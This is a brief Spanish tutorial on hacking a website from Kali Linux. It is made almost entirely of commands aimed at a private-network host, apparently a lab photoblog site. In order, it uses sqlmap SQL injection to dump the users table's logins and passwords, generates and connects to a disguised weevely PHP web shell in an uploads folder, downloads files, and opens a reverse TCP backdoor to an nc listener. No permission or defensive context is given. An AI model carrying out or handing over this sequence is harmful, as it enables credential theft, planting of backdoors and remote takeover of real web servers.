Kali linux hackear una pagina web y manipularla desde kali linux ?
1.- Vamos a obtener la bd
sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs
Esto nos debe de regresar algo asi
2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables
3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns
4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump
Listo hemos obtenido el usuario y password.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
cd ..
git clone https://github.com/epinna/weevely3.git
cd weevely3
python weevely.py generate hacked /root/Escritorio/web.php.jpx
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png
nc -l -p 5412
:backdoor_reversetcp 192.168.8.103 5412